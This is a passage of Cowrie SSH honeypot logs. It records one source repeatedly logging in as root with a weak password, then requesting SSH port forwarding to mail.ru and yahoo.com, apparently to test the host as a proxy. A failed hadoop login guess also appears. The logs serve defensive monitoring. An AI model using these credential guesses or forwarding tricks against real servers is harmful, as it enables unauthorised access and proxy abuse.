fo-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.678012Z","src_ip":"77.83.207.83","session":"e7f3e7cf4612"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.927507Z","src_ip":"77.83.207.83","session":"e7f3e7cf4612"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29902,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29902","sensor":"my-vps","timestamp":"2025-08-31T03:44:52.979144Z","session":"e7f3e7cf4612"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.029378Z","src_ip":"77.83.207.83","session":"e7f3e7cf4612"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":32071,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32071","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.172421Z","session":"e7f3e7cf4612"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.222586Z","src_ip":"77.83.207.83","session":"e7f3e7cf4612"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":193,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:193","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.364419Z","session":"e7f3e7cf4612"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.414468Z","src_ip":"77.83.207.83","session":"e7f3e7cf4612"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.465379Z","src_ip":"77.83.207.83","session":"e7f3e7cf4612"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45399,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3c3eb9f51c8","protocol":"ssh","message":"New connection: 77.83.207.83:45399 (1.2.3.4:22) [session: d3c3eb9f51c8]","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.513655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.514680Z","src_ip":"77.83.207.83","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.564472Z","src_ip":"77.83.207.83","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.812107Z","src_ip":"77.83.207.83","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5494,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5494","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.862608Z","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:53.912467Z","src_ip":"77.83.207.83","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":6442,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6442","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.051973Z","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.101838Z","src_ip":"77.83.207.83","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":15128,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15128","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.244029Z","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.293722Z","src_ip":"77.83.207.83","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.344287Z","src_ip":"77.83.207.83","session":"d3c3eb9f51c8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45478,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac95d4e0fd3c","protocol":"ssh","message":"New connection: 77.83.207.83:45478 (1.2.3.4:22) [session: ac95d4e0fd3c]","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.393686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.402997Z","src_ip":"77.83.207.83","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.443993Z","src_ip":"77.83.207.83","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.693429Z","src_ip":"77.83.207.83","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16955,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16955","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.744815Z","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.794796Z","src_ip":"77.83.207.83","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":23306,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23306","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.936292Z","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:54.986494Z","src_ip":"77.83.207.83","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":20442,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:20442","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.128264Z","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.178196Z","src_ip":"77.83.207.83","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.228947Z","src_ip":"77.83.207.83","session":"ac95d4e0fd3c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45556,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ed2b2238490","protocol":"ssh","message":"New connection: 77.83.207.83:45556 (1.2.3.4:22) [session: 8ed2b2238490]","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.278555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.288743Z","src_ip":"77.83.207.83","session":"8ed2b2238490"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.329002Z","src_ip":"77.83.207.83","session":"8ed2b2238490"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.580977Z","src_ip":"77.83.207.83","session":"8ed2b2238490"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27008,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27008","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.632632Z","session":"8ed2b2238490"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.683508Z","src_ip":"77.83.207.83","session":"8ed2b2238490"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":25076,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25076","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.824913Z","session":"8ed2b2238490"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:55.875378Z","src_ip":"77.83.207.83","session":"8ed2b2238490"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":24824,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:24824","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.017135Z","session":"8ed2b2238490"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"letmein","message":"login attempt [hadoop/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.041094Z","src_ip":"212.227.235.229","session":"3b19619092af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.067872Z","src_ip":"77.83.207.83","session":"8ed2b2238490"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.119811Z","src_ip":"77.83.207.83","session":"8ed2b2238490"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":45646,"dst_ip":"1.2.3.4","dst_port":22,"session":"faa8c0a1d0f5","protocol":"ssh","message":"New connection: 77.83.207.83:45646 (1.2.3.4:22) [session: faa8c0a1d0f5]","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.168835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.169883Z","src_ip":"77.83.207.83","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.220113Z","src_ip":"77.83.207.83","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.426170Z","src_ip":"212.227.235.229","session":"0f5fd33200cc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.469484Z","src_ip":"77.83.207.83","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31508,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31508","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.520361Z","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.570541Z","src_ip":"77.83.207.83","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11628,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11628","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.712932Z","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.763237Z","src_ip":"77.83.207.83","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":25908,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25908","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.904368Z","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:56.954808Z","src_ip":"77.83.207.83","session":"faa8c0a1d0f5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:57.005420Z","src_ip":"77.83.207.83","session":"faa8c0a1d0f5"}
